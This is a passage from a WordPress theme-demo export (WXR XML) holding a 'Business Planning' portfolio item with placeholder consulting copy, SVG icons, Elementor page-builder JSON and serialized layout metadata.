		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/business-planning/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=802</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>June 25, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>802</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[803]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"397902fd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"26a3c89f","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5d3639ae","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"4764c788","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"c953f5b","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"6976af58","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"532be286","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1f8d8f2","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f6bdc05","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"456060bf","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1b23ea4e","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3795aac6","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7c34ff65","elType":"widget","settings":{"editor":"<p>June 25, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"426b0206","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"44248ebd","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"3832640c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"b6a26ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"481b7621","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"61bf7347","elType":"section","settings":[],"elements":[{"id":"7973626c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8010511","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7dbcd64","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1083f5a4","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"624b9840","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2ff2e8a4","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"45a8e90f","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"3e8fbdcf","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"2974a35e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6724e6a1","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"79818356","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"fe213aa","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6f49fcf0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"233e1e1e","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"7c1bd679","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"12088f64","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"915d327","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"6909f67c","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1dd1cb48","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"2511abff","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"54568854","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6a58c18b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"30a0d87d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"424a4171","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Money Market</title>
